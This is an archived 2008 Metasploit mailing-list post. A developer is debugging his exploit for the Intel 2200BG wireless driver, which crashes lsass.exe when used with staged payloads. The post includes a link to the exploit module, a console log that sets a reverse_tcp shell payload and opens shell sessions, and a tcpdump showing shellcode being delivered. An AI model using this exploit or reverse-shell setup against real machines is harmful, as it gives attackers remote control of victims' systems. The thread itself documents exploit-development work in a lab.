Metasploit mailing list archives
Mistake in kernel mode payloads
From: overet at securitydate.it (Giuseppe Gottardi)
Date: Tue, 11 Mar 2008 20:43:41 +0100
On Wed, Feb 27, 2008 at 1:34 AM, <mmiller at hick.org> wrote:
On Wed, Feb 27, 2008 at 01:27:24AM +0100, Giuseppe Gottardi wrote: > Hi mans, > I have a little trouble with windows kernel mode exploitation. > > When an user land payload is executed in the context of lsass.exe > process, it forces the process lsass.exe to exit and the system shut > down after 60 seconds due to lsass.exe system error. What is EXITFUNC set to when you run your exploit? In general, the stager assumes that the user-mode payload will take care of cleanup. Currently, this typically involves a call to ExitProcess, ExitThread, or generating an exception (depending on EXITFUNC). If your EXITFUNC is set to seh this will likely cause lsass to crash in the manner that you're seeing.
Sorry for the latency to get back to you, I have been very busy in this days. I decide to publish the code we talking about. It is a full functional version exploit for Intel centrino 2200BG that you can download from my web site and add to metasploit if you want: http://overet.securitydate.it/stuff/intel_2200BG_probe.rb As you can see, EXITFUNC is not set to seh but the lsass.exe die when I try to use staged payloads. For example... msf exploit(intel_2200BG_probe) > set PAYLOAD windows/shell/reverse_tcp PAYLOAD => windows/shell/reverse_tcp ... msf exploit(intel_2200BG_probe) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- ADDR_DST 00:0e:35:95:7b:45 yes The MAC address to send this to CHANNEL 1 yes The default channel number DELAY 1 yes The number of seconds to sleep between the packets DRIVER madwifing yes The name of the wireless driver for lorcon INTERFACE ath8 yes The name of the wireless interface RUNTIME 1000 yes The number of time to run the attack Payload options: Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique: seh, thread, process LHOST 192.168.33.212 yes The local address LPORT 4444 yes The local port Exploit target: Id Name -- ---- 0 Windows XP SP2 (5.1.2600), w22n51.sys 8.0.12.20000 msf exploit(intel_2200BG_probe) > rexploit [*] Started reverse handler [*] Sending probe exploit to 00:0e:35:95:7b:45... [-] #################################################################################################################[*] Sending stage (474 bytes) [*] Command shell session 2 opened (192.168.33.212:4444 -> 192.168.33.159:1085) # [*] Completed sending probe. (lsass.exe die) tcpdump output: 15:45:30.849331 IP overet.imgames > 192.168.33.212.krb524: S 1057652243:1057652243(0) win 65535 <mss 1460,nop,nop,sackOK> 0x0000: 4500 0030 1abe 4000 8006 1b46 c0a8 219f E..0.. at ....F..!. 0x0010: c0a8 21d4 0435 115c 3f0a 7e13 0000 0000 ..!..5.\?.~..... 0x0020: 7002 ffff ebac 0000 0204 05b4 0101 0402 p............... 15:45:30.849386 IP 192.168.33.212.krb524 > overet.imgames: S 3241052817:3241052817(0) ack 1057652244 win 5840 <mss 1460,nop,nop,sackOK> 0x0000: 4500 0030 0000 4000 4006 7604 c0a8 21d4 E..0.. at .@.v...!. 0x0010: c0a8 219f 115c 0435 c12e 8a91 3f0a 7e14 ..!..\.5....?.~. 0x0020: 7012 16d0 890b 0000 0204 05b4 0101 0402 p............... 15:45:30.849506 IP overet.imgames > 192.168.33.212.krb524: . ack 1 win 65535 0x0000: 4500 0028 1abf 4000 8006 1b4d c0a8 219f E..(.. at ....M..!. 0x0010: c0a8 21d4 0435 115c 3f0a 7e14 c12e 8a92 ..!..5.\?.~..... 0x0020: 5010 ffff cc9f 0000 0000 0000 0000 P............. 15:45:30.850715 IP 192.168.33.212.krb524 > overet.imgames: P 1:475(474) ack 1 win 5840 0x0000: 4500 0202 8379 4000 4006 f0b8 c0a8 21d4 E....y at .@.....!. 0x0010: c0a8 219f 115c 0435 c12e 8a92 3f0a 7e14 ..!..\.5....?.~. 0x0020: 5018 16d0 e9ca 0000 6833 3200 0068 5753 P.......h32..hWS 0x0030: 325f 57fc e84c 0000 0060 8b6c 2428 8b45 2_W..L...`.l$(.E 0x0040: 3c8b 7c05 7801 ef8b 4f18 8b5f 2001 ebe3 <.|.x...O.._.... 0x0050: 3049 0I 15:45:30.988871 IP overet.imgames > 192.168.33.212.krb524: . ack 475 win 65061 0x0000: 4500 0028 1ac0 4000 8006 1b4c c0a8 219f E..(.. at ....L..!. 0x0010: c0a8 21d4 0435 115c 3f0a 7e14 c12e 8c6c ..!..5.\?.~....l 0x0020: 5010 fe25 cc9f 0000 0000 0000 0000 P..%.......... msf exploit(intel_2200BG_probe) > sessions -l Active sessions =============== Id Description Tunnel -- ----------- ------ 1 Command shell 192.168.33.212:4444 -> 192.168.33.159:1234 2 Command shell 192.168.33.212:4444 -> 192.168.33.159:1077 msf exploit(intel_2200BG_probe) > sessions -i 2 [*] Starting interaction with 2... ( Session doesn't appear :/ ) However, the exploit works with "windows/exec" payload. Do you have any idea about this problem? Thanks for your support and regards, Giuseppe Gottardi
Current thread:
- Mistake in kernel mode payloads Giuseppe Gottardi (Feb 26)
- Mistake in kernel mode payloads mmiller at hick.org (Feb 26)
- Mistake in kernel mode payloads Giuseppe Gottardi (Mar 11)
- Mistake in kernel mode payloads Matt Miller (Mar 11)
- Mistake in kernel mode payloads Giuseppe Gottardi (Mar 11)
- Mistake in kernel mode payloads mmiller at hick.org (Feb 26)